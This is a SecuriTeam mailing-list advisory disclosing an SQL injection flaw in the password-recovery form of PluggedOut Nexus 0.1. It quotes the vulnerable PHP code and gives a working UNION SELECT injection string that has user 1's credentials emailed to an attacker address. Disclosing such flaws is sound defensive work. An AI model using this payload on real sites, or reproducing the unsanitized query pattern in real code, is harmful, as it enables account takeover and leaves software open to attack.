[UNIX] PluggedOut Nexus SQL injection



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



PluggedOut Nexus SQL injection
------------------------------------------------------------------------


SUMMARY

<http://www.pluggedout.com> Nexus is "an open source script you can run
on your web server to give you a community based website where people can
register, search each others interests, and communicate with one another
either through a private messaging system, or via chat". An SQL injection
vulnerability in the Nexus PluggedOut product allows remote attackers to
gain access to the hashed password of any user they desire.

DETAILS

Vulnerable Systems:
* PluggedOut Nexus version 0.1

The forgotten_password.php file doesn't not properly sanitize the 'email'
parameter, allowing remote attackers to inject arbitrary SQL into the
file's password recovery SQL statement.

Vulnerable code:
The following lines in "forgotten_password.php" :
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users
WHERE cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder
message, please contact the ".$site_long_name." administrator
(".$admin_email.")\n";

send_email($from,$to,$subject,$body);

Exploit:
Insert the following SQL statement into the email address
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from nexus_users WHERE
nUserId=1 and '1'='1

Which will cause the ATTACKER@xxxxxxxxxxxxx to receive an email that
contains the username & password for userID=1.


ADDITIONAL INFORMATION

The original article can be found at: <http://hamid.ir/security/>
http://hamid.ir/security/
The information has been provided by <mailto:het_ebadi@xxxxxxxxx> h e.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] WordPress Cafelog SQL Injection Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPress Cafelog has been found to contain an SQL Injection vulnerability ...
    (Securiteam)
  • [REVS] Lateral SQL Injection: a New Class of Vulnerability in Oracle
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lateral SQL Injection: a New Class of Vulnerability in Oracle ... How can an attacker exploit a PL/SQL procedure that doesn't even take user ... is then dynamically executed via the EXECUTE IMMEDIATE statement. ...
    (Securiteam)
  • [NEWS] Opera Software Opera Web Browser createSVGTransformFromMatrix Object Typecasting Vulnerabilit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Opera Software Opera Web Browser createSVGTransformFromMatrix Object ... Exploitation of this vulnerability would allow an attacker to execute ...
    (Securiteam)
  • [NEWS] Adobe Acrobat Javascript for PDF Integer Overflow Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Adobe Acrobat Javascript for PDF Integer Overflow Vulnerability ...
    (Securiteam)
  • [UNIX] ZeroBoard PHP Code Injection and XSS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attacker can cause the script to utilize arbitrary external PHP code. ... For the first vulnerability, and for zboard version 4.1pl4, insert the ...
    (Securiteam)